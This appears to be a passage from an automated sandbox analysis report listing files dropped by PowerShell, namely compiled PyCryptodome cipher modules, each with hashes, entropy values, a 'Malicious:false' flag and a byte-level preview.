                                                                                                                                                                                                                      SSDEEP:192:nLez5nVn9EXdHXkItPdZ9Qj0lFvgggyNI:nLe9atPFQj0lF3I
                                                                                                                                                                                                                      MD5:E2177E54EABAE61FB56400D1DB32E0FB
                                                                                                                                                                                                                      SHA1:816357B4E46C9B36D86474C32FFFDCF7A16BDB28
                                                                                                                                                                                                                      SHA-256:D344E1AA404E29AAE08006A19E46363C4C14164E025CB39E8A8010C1415710B0
                                                                                                                                                                                                                      SHA-512:5F7B7C6E4E5ABBE783E2CB7CDB5B7B4C8361A588BE07631E0460D0DF0C456D4B9D4FE3742C339CFF26AA3887A50482E5CD31AC4C21D69A864ADEBDC4E663F003
                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                      Preview:........)m.e.#..............................d.d.l.Z.d.d.l.m.Z...d.d.l.m.Z.m.Z.m.Z.m.Z.m.Z...d.d.l.m.Z...d.d.l.m.Z...d.Z.d.Z.d.Z.d.Z.d.Z.d.Z.d.Z.d.Z.d.Z.d.Z.d.Z.d.Z...e.d.e.........Z...d.Z...e.j6..........................r...e.d.e.j9..................d.d.................Z.d...Z.d...Z.d...Z d.Z!d.Z"y.#.e.$.r...Y...w.x.Y.w.)......N)..._create_cipher)...load_pycryptodome_raw_lib..VoidPointer..SmartPointer..c_size_t..c_uint8_ptr)..._cpu_features)...get_random_bytes.......................................................a..... int AES_start_operation(const uint8_t key[],. size_t key_len,. void **pResult);. int AES_encrypt(const void *state,. const uint8_t *in,. uint8_t *out,. size_t data_len);. int AES_decrypt(const void *state,. const uint8_t *in,. uint8_t *out,. size_t data
                                                                                                                                                                                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                      File Type:data
                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                      Size (bytes):6660
                                                                                                                                                                                                                      Entropy (8bit):5.304447641447283
                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                      SSDEEP:96:1DMsusqGQ/uT3mv2mmynGdtLAvEjIcgrlYkwofbgggMwP:1d9ESmmynGdtcAf6dTgggVP
                                                                                                                                                                                                                      MD5:B3995D6B9F1AE074B09ABAF45ED9EE5A
                                                                                                                                                                                                                      SHA1:211B48B912A678A2A676E3255F80859B8436BFE6
                                                                                                                                                                                                                      SHA-256:D4FA675C09714D6D948A08550088FAD428438C041B54A46405B262FE30DC3DFD
                                                                                                                                                                                                                      SHA-512:04FD82B4A0188C8691C575AE0BAE259DCB25E5879B84A3B4E9D391EFC9EDB3A1A5BCC60D9B86CA4DB9E2E184FAD2A343B1B3D98A59E89D3BF553B56C776869AE
                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                      Preview:........)m.e!..............................d.Z.d.d.l.Z.d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z.m.Z.m.Z.m.Z.m.Z.....e.d.d.........Z.d...Z.d...Z.d.Z.d.Z.d.Z.d.Z.d.Z.d.Z.d.Z.d.Z...e.d.d.........Z.y.).a.....Module's constants for the modes of operation supported with ARC2:..:var MODE_ECB: :ref:`Electronic Code Book (ECB) <ecb_mode>`.:var MODE_CBC: :ref:`Cipher-Block Chaining (CBC) <cbc_mode>`.:var MODE_CFB: :ref:`Cipher FeedBack (CFB) <cfb_mode>`.:var MODE_OFB: :ref:`Output FeedBack (OFB) <ofb_mode>`.:var MODE_CTR: :ref:`CounTer Mode (CTR) <ctr_mode>`.:var MODE_OPENPGP: :ref:`OpenPGP Mode <openpgp_mode>`.:var MODE_EAX: :ref:`EAX Mode <eax_mode>`......N)..._create_cipher)...byte_string)...load_pycryptodome_raw_lib..VoidPointer..SmartPointer..c_size_t..c_uint8_ptrz.Cryptodome.Cipher._raw_arc2a?.... int ARC2_start_operation(const uint8_t key[],. size_t key_len,. size_t effective_
                                                                                                                                                                                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                      File Type:data
                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                      Size (bytes):4895
                                                                                                                                                                                                                      Entropy (8bit):5.35765837270433
                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                      SSDEEP:96:N87/a6kvs0xDewWtft8r9Dkx5Qkkbg+tqzq2V6KzA7:+7/ypYClkSEOqe2V6EA7
                                                                                                                                                                                                                      MD5:AAFABE2E680739A38F24EC68E681DDDE
                                                                                                                                                                                                                      SHA1:44E3A31463A0B645E2203364829837B1994B852F
                                                                                                                                                                                                                      SHA-256:67C5C850508E6BF9BBF52AA1DA1279F3D63D2671243E4DA1E903A37A3C6CAB63
                                                                                                                                                                                                                      SHA-512:6101D0D529FB8A8F775254FCE2F2C8C578AFB0E47D09814DABA9EAA1E80F090CB3C264B7C1AE700F418A4BEE841804742FE2C66E61C1EC2D2436237387C4DAF8
                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                      Preview:........)m.e..........................j.....d.d.l.m.Z.m.Z.m.Z.m.Z.m.Z.m.Z.m.Z.....e.d.d.........Z...G.d...d.........Z.d...Z.d.Z...e.d.d.........Z.y.)......)...load_pycryptodome_raw_lib..VoidPointer..create_string_buffer..get_raw_buffer..SmartPointer..c_size_t..c_uint8_ptrz.Cryptodome.Cipher._ARC4al.... int ARC4_stream_encrypt(void *rc4State, const uint8_t in[],. uint8_t out[], size_t len);. int ARC4_stream_init(uint8_t *key, size_t keylen,. void **pRc4State);. int ARC4_stream_destroy(void *rc4State);. c.....................".....e.Z.d.Z.d.Z.d...Z.d...Z.d...Z.y.)...ARC4CipherzgARC4 cipher object. Do not create it directly. Use. :func:`Cryptodome.Cipher.ARC4.new` instead.. c.....................P.....t.........|.........d.kD..r.|.d.....}.|.d.d...}.n.|.j...................d.d.........}.t.........|.........t.........v.r.t......
                                                                                                                                                                                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                      File Type:data
                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                      Size (bytes):5673
                                                                                                                                                                                                                      Entropy (8bit):5.380000467438241
                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                      SSDEEP:96:Z8uYWfcCYUi//MW7PfmPtLAvE4AOLlsEgggMv:WgG13p7fmPtcfJBsEggge
                                                                                                                                                                                                                      MD5:64E798D8128EF1B2EF557285AC438DF8
                                                                                                                                                                                                                      SHA1:F321EB4DD9413793FD2E7013766CB6361CB1164F
                                                                                                                                                                                                                      SHA-256:1B973FBE8FA133EA2CDFD70E99B0C605A4880BA4184B2478755C4D91D89F1587
                                                                                                                                                                                                                      SHA-512:CBFA355A9B78AD7FE71C0A770116E65779E9839446C32485C0C95CAD2B9CE00229E47A40E71B741191ABA630BC054194BC658D8CDA8DFB3C7692E2712221736B
                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                      Preview:........)m.e...............................d.Z.d.d.l.Z.d.d.l.m.Z...d.d.l.m.Z.m.Z.m.Z.m.Z.m.Z.....e.d.d.........Z.d...Z.d...Z.d.Z.d.Z.d.Z.d.Z.d.Z.d.Z.d.Z.d.Z...e.d.d.........Z.y.).a.....Module's constants for the modes of operation supported with Blowfish:..:var MODE_ECB: :ref:`Electronic Code Book (ECB) <ecb_mode>`.:var MODE_CBC: :ref:`Cipher-Block Chaining (CBC) <cbc_mode>`.:var MODE_CFB: :ref:`Cipher FeedBack (CFB) <cfb_mode>`.:var MODE_OFB: :ref:`Output FeedBack (OFB) <ofb_mode>`.:var MODE_CTR: :ref:`CounTer Mode (CTR) <ctr_mode>`.:var MODE_OPENPGP: :ref:`OpenPGP Mode <openpgp_mode>`.:var MODE_EAX: :ref:`EAX Mode <eax_mode>`......N)..._create_cipher)...load_pycryptodome_raw_lib..VoidPointer..SmartPointer..c_size_t..c_uint8_ptrz.Cryptodome.Cipher._raw_blowfishaT.... int Blowfish_start_operation(const uint8_t key[],. size_t key_len,. void **pResult);. int Blowfish_encrypt(const void *state,.
                                                                                                                                                                                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                      File Type:data
                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                      Size (bytes):5788
                                                                                                                                                                                                                      Entropy (8bit):5.337218777586967
                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                      SSDEEP:96:/BD+8EOtxG9UQ/XarOuezUFmz/tLAvE4HRLlIrrSMgggM6:Joq89UEXauzUFmz/tcfxBQSMgggT
                                                                                                                                                                                                                      MD5:4ED7BB525CA6CA7CD57D39B532108E92
                                                                                                                                                                                                                      SHA1:02C37D6F74FCC530796C8474F9781669ACD0ED54
                                                                                                                                                                                                                      SHA-256:EEE5491D7AD2279947564D1C2068E23C0606C555F6C1098E96A787560F8AB29B
                                                                                                                                                                                                                      SHA-512:66145885CF94ADC889E0D558E2B938908146498D9473EFC5E01AB546958C1656BD36A410237C3CE555F4293E5F6F7533A4DF0D89F7168A4EC73D2C4C774584F9
                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                      Preview:........)m.ef..............................d.Z.d.d.l.Z.d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z.m.Z.m.Z.m.Z.m.Z.....e.d.d.........Z.d...Z.d...Z.d.Z.d.Z.d.Z.d.Z.d.Z.d.Z.d.Z.d.Z...e.d.d.........Z.y.).a.....Module's constants for the modes of operation supported with CAST:..:var MODE_ECB: :ref:`Electronic Code Book (ECB) <ecb_mode>`.:var MODE_CBC: :ref:`Cipher-Block Chaining (CBC) <cbc_mode>`.:var MODE_CFB: :ref:`Cipher FeedBack (CFB) <cfb_mode>`.:var MODE_OFB: :ref:`Output FeedBack (OFB) <ofb_mode>`.:var MODE_CTR: :ref:`CounTer Mode (CTR) <ctr_mode>`.:var MODE_OPENPGP: :ref:`OpenPGP Mode <openpgp_mode>`.:var MODE_EAX: :ref:`EAX Mode <eax_mode>`......N)..._create_cipher)...byte_string)...load_pycryptodome_raw_lib..VoidPointer..SmartPointer..c_size_t..c_uint8_ptrz.Cryptodome.Cipher._raw_casta..... int CAST_start_operation(const uint8_t key[],. size_t key_len,. void **pResult);.
                                                                                                                                                                                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                      File Type:data
                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                      Size (bytes):10010
                                                                                                                                                                                                                      Entropy (8bit):5.353089190891848
                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                      SSDEEP:192:/OFrhM02bMOimuaM3P7KD9bIpHVFQjsdUMN0JiUcPWFPZ5+:GLM02bximwPGD9bEVFPdUbwUcPoP7+
                                                                                                                                                                                                                      MD5:80E775CB9580DE9111EB6792A25E4598
                                                                                                                                                                                                                      SHA1:C04394F7E551A0BC4B4C4C38B7D40AA9D841AB9D
                                                                                                                                                                                                                      SHA-256:EAD4F3DCC9E95C668005FB54C33B13433673668F770A032C94FE2DC68910D42B
                                                                                                                                                                                                                      SHA-512:2BAF609630917F38EE831F4D55B098CA05092D25E0544A037564A454DCEDE0CD237EFA9080E9E2E55C6828F43AF1DE0E520523AD243791102B18AEC0C8C2693A
                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                      Preview:........)m.e#+.............................d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z.m.Z.m.Z.m.Z.m.Z.m.Z.m.Z.m.Z.m.Z.....e.d.d.........Z.d...Z...G.d...d.e.........Z.d...Z.d...Z.d.Z.d.Z.y.)......)...get_random_bytes)..._copy_bytes)...load_pycryptodome_raw_lib..create_string_buffer..get_raw_buffer..VoidPointer..SmartPointer..c_size_t..c_uint8_ptr..c_ulong..is_writeable_bufferz.Cryptodome.Cipher._chacha20a..... int chacha20_init(void **pState,. const uint8_t *key,. size_t keySize,. const uint8_t *nonce,. size_t nonceSize);.. int chacha20_destroy(void *state);.. int chacha20_encrypt(void *state,. const uint8_t in[],. uint8_t out[],. size_t len);.. int chacha2
                                                                                                                                                                                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                      File Type:data
                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                      Size (bytes):13462
                                                                                                                                                                                                                      Entropy (8bit):5.288983638447428
                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                      SSDEEP:192:FcN1i/mPJoCle5i4f1WdAHqyRoe8dumA++f0dBaBqoVCXn+k:+riOPJO1UiqyRoe2HA+bEBC3+k
                                                                                                                                                                                                                      MD5:C4625F795A36B8CD9F4417A4B67D17F5
                                                                                                                                                                                                                      SHA1:5945043C70A55F8F149940601F97D561DEC37941
                                                                                                                                                                                                                      SHA-256:F5E8C7BB5BA220E3899175C8DDC33E2900C81532336C559FF6408ED4987F7E4B
                                                                                                                                                                                                                      SHA-512:5FFDF07EDD5FC0C3E6EA2978D67F3F5CBEF57A855F60EF5FDD72FEB3F76C2B9B114AFF892A7D5BD9E95488708D1E099F5B8A6181D5C94A4E81BC0A943B599182
                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                      Preview:........)m.e...............................d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z.m.Z...d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z.m.Z...d.d.l.m.Z...d...Z...e.d.d.d...........Z...G.d...d.e.........Z.d...Z.d.Z.y.)......)...unhexlify)...ChaCha20)..._HChaCha20)...Poly1305..BLAKE2s)...get_random_bytes)...long_to_bytes)..._copy_bytes..bord)...is_bufferc...........................t.........d.d.|.........S.).N..Enum..)...type)...enumss.... .wC:\Users\Administrator\AppData\Local\Programs\Python\Python312\Lib\site-packages\Cryptodome/Cipher/ChaCha20_Poly1305.py.._enumr....,...s..............E..".."....................)...PROCESSING_AUTH_DATA..PROCESSING_CIPHERTEXT..PROCESSING_DONEc.....................\.....e.Z.d.Z.d.Z.d...Z.d...Z.d...Z.d.d...Z.d.d...Z.d...Z.d...Z.d...Z.d...Z.d...Z.d...Z.d...Z.y.)...ChaCha20Poly1305Cipherz.ChaCha20-Poly1305 and XChaCha20-Poly1305 cipher object.. Do not create it directly. Use :py:func:`new` instead... :var nonce: The nonce with length 8, 12 or 24 bytes.
                                                                                                                                                                                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                      File Type:data
                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                      Size (bytes):5662
                                                                                                                                                                                                                      Entropy (8bit):5.34759215526524
                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                      SSDEEP:96:tDYaCGeGx/er564x6stLAv74Q+bLlnrSRaEgggMP:t1xpeM4ftcsBBrSRlgggY
                                                                                                                                                                                                                      MD5:CD5BA94FCCB2C47BDCBCA3755AD29E79
                                                                                                                                                                                                                      SHA1:B93C0E8F5958C5D31F439763F8488233FE4ECD19
                                                                                                                                                                                                                      SHA-256:12E8D3EF7515BEC4793C82A77C87E588273740E25359924EFFEF11DFF523503E
                                                                                                                                                                                                                      SHA-512:4725DE9F9064ABB3B62ABC8CC21D5B2161C0A8C6D9B6FC47147115D7559F9AD2BE83C6888874A92BA0C2DD12819F7ACFC08A6CBBC50D869B23847985560441BF
                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                      Preview:........)m.e...............................d.Z.d.d.l.Z.d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z.m.Z.m.Z.m.Z.m.Z.....e.d.d.........Z.d...Z.d...Z.d.Z.d.Z.d.Z.d.Z.d.Z.d.Z.d.Z.d.Z.d.Z.y.).a.....Module's constants for the modes of operation supported with Single DES:..:var MODE_ECB: :ref:`Electronic Code Book (ECB) <ecb_mode>`.:var MODE_CBC: :ref:`Cipher-Block Chaining (CBC) <cbc_mode>`.:var MODE_CFB: :ref:`Cipher FeedBack (CFB) <cfb_mode>`.:var MODE_OFB: :ref:`Output FeedBack (OFB) <ofb_mode>`.:var MODE_CTR: :ref:`CounTer Mode (CTR) <ctr_mode>`.:var MODE_OPENPGP: :ref:`OpenPGP Mode <openpgp_mode>`.:var MODE_EAX: :ref:`EAX Mode <eax_mode>`......N)..._create_cipher)...byte_string)...load_pycryptodome_raw_lib..VoidPointer..SmartPointer..c_size_t..c_uint8_ptrz.Cryptodome.Cipher._raw_desa..... int DES_start_operation(const uint8_t key[],. size_t key_len,. void **pResult);. int DES_encrypt(cons
                                                                                                                                                                                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                      File Type:data
                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                      Size (bytes):7023
                                                                                                                                                                                                                      Entropy (8bit):5.440070856346476
                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                      SSDEEP:96:7O/cO8Ljr7NkIOM7VIjKBha2QIuGkR+TiC6TtLAvE4YbiPBl3003gggM4m:Smr78MBLLXukTi/tcfYUfE03gggvm
                                                                                                                                                                                                                      MD5:289BF7EB9780F5C5A48ABCA7EE57970A
                                                                                                                                                                                                                      SHA1:CC60BC79888366F4A2D42CA5EB2A3C10F6CE6A2A
                                                                                                                                                                                                                      SHA-256:34A18B38C9A65CF7665E8AD93F07D735013259FFBCCABFAEA10B7A3BD7A08841
                                                                                                                                                                                                                      SHA-512:B84FCDE4FE22F25238DABF049AD94D9A6628D3CF494DAA28B5D38F8B98D46332E1A5149C95B9C05A429AC92F789CBD7AF499E0A4BC59CFA2154F52953DF2B161
                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                      Preview:........)m.e...............................d.Z.d.d.l.Z.d.d.l.m.Z...d.d.l.m.Z.m.Z.m.Z.m.Z...d.d.l.m.Z.m.Z.m.Z.m.Z.....e.d.d.........Z.d...Z.d...Z.d...Z.d.Z.d.Z.d.Z.d.Z.d.Z.d.Z.d.Z.d.Z.d.Z.y.).a.....Module's constants for the modes of operation supported with Triple DES:..:var MODE_ECB: :ref:`Electronic Code Book (ECB) <ecb_mode>`.:var MODE_CBC: :ref:`Cipher-Block Chaining (CBC) <cbc_mode>`.:var MODE_CFB: :ref:`Cipher FeedBack (CFB) <cfb_mode>`.:var MODE_OFB: :ref:`Output FeedBack (OFB) <ofb_mode>`.:var MODE_CTR: :ref:`CounTer Mode (CTR) <ctr_mode>`.:var MODE_OPENPGP: :ref:`OpenPGP Mode <openpgp_mode>`.:var MODE_EAX: :ref:`EAX Mode <eax_mode>`......N)..._create_cipher)...byte_string..bchr..bord..bstr)...load_pycryptodome_raw_lib..VoidPointer..SmartPointer..c_size_tz.Cryptodome.Cipher._raw_des3a..... int DES3_start_operation(const uint8_t key[],. size_t key_len,. void **pResult);.
                                                                                                                                                                                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                      File Type:data
                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                      Size (bytes):8989
                                                                                                                                                                                                                      Entropy (8bit):5.318996715009682
                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                      SSDEEP:96:PK37pbVxOUIqk0mudjErmoWbUfo+BT9tP7MAoOccG6IyhBoVbqdLSRRIabJvqkff:Po9W/FpT64lTH4Ao4gFqdLSXVFf2i9
                                                                                                                                                                                                                      MD5:B351495E8B1B30822850A9292DB1C736
                                                                                                                                                                                                                      SHA1:B6D0DC3DA127FB47A77C6EA6033A1FC2785DC693
                                                                                                                                                                                                                      SHA-256:DFB674A5EA0F8F515C579B4CD626F1C4E64C55657E7D416F71A3A59230DE17C5
                                                                                                                                                                                                                      SHA-512:9DDD7CF8732921C4DD5A582D0AFDB6A81511C88D82E1B88E3D17F3AECFD045D3E061DA3457567028F8344B0BC3CD1CA6A3CF146C595EA9700C982679619E452C
                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                      Preview:........)m.e.".............................d.d.l.m.Z...d.d.l.Z.d.d.l.m.Z...d.d.l.Z.d.d.l.m.Z.m.Z.m.Z...d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z.....G.d...d.........Z.d.d...Z.y.)......)...MGF1N)..._copy_bytes)...ceil_div..bytes_to_long..long_to_bytes)...strxor)...Random.....)...oaep_decodec...........................e.Z.d.Z.d.Z.d...Z.d...Z.d...Z.d...Z.d...Z.y.)...PKCS1OAEP_CipherzXCipher object for PKCS#1 v1.5 OAEP.. Do not create directly: use :func:`new` instead.c.............................|..._.........|.r.|..._.........n.t.........j...................j....................._.........|.r.|..._.........n...f.d....._.........t.........d.d.|..........._.........|..._.........y.).a....Initialize this PKCS#1 OAEP cipher object... :Parameters:. key : an RSA key object. If a private half is given, both encryption and decryption are possible.. If a public half is given, only encryption is possible.. hashAlgo : hash object. The
                                                                                                                                                                                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                      File Type:data
                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                      Size (bytes):7090
                                                                                                                                                                                                                      Entropy (8bit):5.381218689655665
                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                      SSDEEP:96:/nM2utVeY7bNuMxliDO7XePA+0OEM+78F2ON5edNeYe6Kz1TKe:/sDrMMfiCCP2l8rNkdNudKe
                                                                                                                                                                                                                      MD5:78496D5BF225BC0E275D4678BD0D5294
                                                                                                                                                                                                                      SHA1:2CA622E25BDECCA49E18F07B3C633FFEBF7714DC
                                                                                                                                                                                                                      SHA-256:629C71B192E2866CF782F4D4794BD047FDCC700948A89926252C6653661434B3
                                                                                                                                                                                                                      SHA-512:1B06AF7EA0B0619EDCDA5259C59465B9963F65B2345FA24FFD9570C6A8850BCB3BB9DAD99E1EA19DACC9636607DC25D143B707BCB539A089829BA956642EB4A9
                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                      Preview:........)m.e@.........................d.....d.d.g.Z.d.d.l.m.Z...d.d.l.m.Z.m.Z...d.d.l.m.Z.m.Z.m.Z...d.d.l.m.Z.....G.d...d.........Z.d.d...Z.y.)...new..PKCS115_Cipher.....)...Random)...bytes_to_long..long_to_bytes)...bord..is_bytes.._copy_bytes.....)...pkcs1_decodec.....................0.....e.Z.d.Z.d.Z.d...Z.d...Z.d...Z.d...Z.d.d...Z.y.).r....z.This cipher can perform PKCS#1 v1.5 RSA encryption or decryption.. Do not instantiate directly. Use :func:`Cryptodome.Cipher.PKCS1_v1_5.new` instead.c..................... .....|.|._.........|.|._.........y.).aJ...Initialize this PKCS#1 v1.5 cipher object... :Parameters:. key : an RSA key object. If a private half is given, both encryption and decryption are possible.. If a public half is given, only encryption is possible.. randfunc : callable. Function that returns random bytes.. N)..._key.._randfunc)...self..key..randfuncs.... .pC:\Users\Administrator\AppData\Local\Programs\Python\
                                                                                                                                                                                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                      File Type:data
                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                      Size (bytes):6010
                                                                                                                                                                                                                      Entropy (8bit):5.301345423842706
                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                      SSDEEP:96:VatWkv3EZO+HP2gWa/CSuzn8YIQLBwrNps7i8VvbsxPPtysd:V6TyQ+2dfFVz83
                                                                                                                                                                                                                      MD5:6B8594592AE49D825B5586BBA694330F
                                                                                                                                                                                                                      SHA1:FDAB15346B1FEDBBA7CEAB433A2642BF4E89F2E2
                                                                                                                                                                                                                      SHA-256:215C34749736B2654C9C33FC7BB92E613B2E8018E33303D9FB4FBF9604C17452
                                                                                                                                                                                                                      SHA-512:A8C4761CF98F53C93BC83E72CC7205C85B66F5CCBF739958A1272C6DB3C0F8741A593E800E4E100503D7301886EFE06999844FF859D5FF4FC798DF75AECFC840
                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                      Preview:........)m.e..........................z.....d.d.l.m.Z...d.d.l.m.Z.m.Z.m.Z.m.Z.m.Z.m.Z.m.Z.m.Z...d.d.l.m.Z.....e.d.d.........Z...G.d...d.........Z.d.d...Z.d.Z.d.Z.y.)......)..._copy_bytes)...load_pycryptodome_raw_lib..create_string_buffer..get_raw_buffer..VoidPointer..SmartPointer..c_size_t..c_uint8_ptr..is_writeable_buffer)...get_random_bytesz.Cryptodome.Cipher._Salsa20a..... int Salsa20_stream_init(uint8_t *key, size_t keylen,. uint8_t *nonce, size_t nonce_len,. void **pSalsaState);. int Salsa20_stream_destroy(void *salsaState);. int Salsa20_stream_encrypt(void *salsaState,. const uint8_t in[],. uint8_t out[], size_t len);. c.....................&.....e.Z.d.Z.d.Z.d...Z.d.d...Z.d.d...Z.y.)...Salsa20Cipherz.Salsa20 cipher object. Do not
                                                                                                                                                                                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                      File Type:data
                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                      Size (bytes):4419
                                                                                                                                                                                                                      Entropy (8bit):5.259055201098961
                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                      SSDEEP:96:oF+mpXvaWWWaLU+0PivDDMqOTvd7moVH4ydB:W+9LU+F36l7mQD
                                                                                                                                                                                                                      MD5:88B57742C90366ED1F231FDD1437C828
                                                                                                                                                                                                                      SHA1:CA66CD2307A5988DC1CAFCDB379BDB31219D1E6E
                                                                                                                                                                                                                      SHA-256:52741AA1700065B9808D0C0BA882261EE15686622449EA4CCCE664F9165BEDDB
                                                                                                                                                                                                                      SHA-512:E9BC7416AA06CBCF4E743EA3A9835CDEA8B35C81F6335E72E436F2576CAF24568B1DFFF6D82924645A0E464831CACB5A05AF037D800D05517CDE0222364DA2A2
                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                      Preview:........)m.e..........................p.....d.d.l.Z.d.d.l.m.Z...d.d.l.m.Z.m.Z.m.Z.m.Z.m.Z.m.Z.....e.d.d.........Z.d...Z.d...Z.d.Z.d.Z...e.d.d.........Z.y.)......N)..._create_cipher)...load_pycryptodome_raw_lib..VoidPointer..SmartPointer..c_size_t..c_uint8_ptr..c_uintz"Cryptodome.Cipher._raw_eksblowfishaa.... int EKSBlowfish_start_operation(const uint8_t key[],. size_t key_len,. const uint8_t salt[16],. size_t salt_len,. unsigned cost,. unsigned invert,. void **pResult);. int EKSBlowfish_encrypt(const void *state,. const uint8_t *in,. uint8_t *out,. size_t data_len);. int EKSBlowfish_decrypt(const void *state,. con
                                                                                                                                                                                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                      File Type:data
                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                      Size (bytes):2216
                                                                                                                                                                                                                      Entropy (8bit):5.557087858772992
                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                      SSDEEP:24:tbXzLMJAXWXAOvUgcn8hkAiTzEklnlq/Hlhs1cb8qt1nI6uQBHQ42x60JLFD9gAm:t7zLMJtQLqGlla84n1s42xd9lJ0t2ur
                                                                                                                                                                                                                      MD5:99AE5C093FD0B51039C2E28D5C015420
                                                                                                                                                                                                                      SHA1:38DAA032A028D9A06849D60DDEAFBF42E4BDDE56
                                                                                                                                                                                                                      SHA-256:B2095CBECB04CC66F27D8D77CE52A969B91DC97F9D0276681E5F34F0D96A9864
                                                                                                                                                                                                                      SHA-512:58A0019620F43F36710A7B35E66B50A07099421532424EF407CB0B4E9585D25135D8895E4B21BD7A2DD64BB89BEC2B2DB96D7F2E281BC7AC373B4C678019F76F
                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                      Preview:........)m.e...............................d.d.l.Z.d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z...e.e.e.e.e.e.e.d...Z.e.e.e.e.d...Z.d...Z.y.)......N)..._create_ecb_cipher)..._create_cbc_cipher)..._create_cfb_cipher)..._create_ofb_cipher)..._create_ctr_cipher)..._create_openpgp_cipher)..._create_ccm_cipher)..._create_eax_cipher)..._create_siv_cipher)..._create_gcm_cipher)..._create_ocb_cipher)....................................).....................c..........................|.|.d.<...t.........t.................}.|.j...................d.d.........r.|.j...................t...................|.|.v.r.t.........d...........|.rz|.d.v.r"t.........|.........d.kD..r.t.........d...........|.d.....|.d.<...nT|.d.v.r"t.........|.........d.kD..r.t.........d...........|.d.....|.d.<...n.|.d.k(..r.t.........|.........d.kD..r.t.........d...........|.d.k(..r.t.........d.............|.|.....|.f.i.|.....S.).N..key..add
                                                                                                                                                                                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                      File Type:data
                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                      Size (bytes):9664
                                                                                                                                                                                                                      Entropy (8bit):5.268347232199073
                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                      SSDEEP:96:06kvJbQ9XIYEgUNfu4nx3ZJpSSlUeWsArt834mGvWcsQAn9rTzVt83425pKInt7C:KbJEUNfu4x3Z+H/U4czU4QnA0QtVB
                                                                                                                                                                                                                      MD5:53E4773675A0D2604CCE612A5F080822
                                                                                                                                                                                                                      SHA1:4533F40B78EF857666B42BD769EB8AFB9873E70D
                                                                                                                                                                                                                      SHA-256:7A72EBEFB8B9AA2A055E694506FF68F99C3CCFADB83251A587B56404647FDD4C
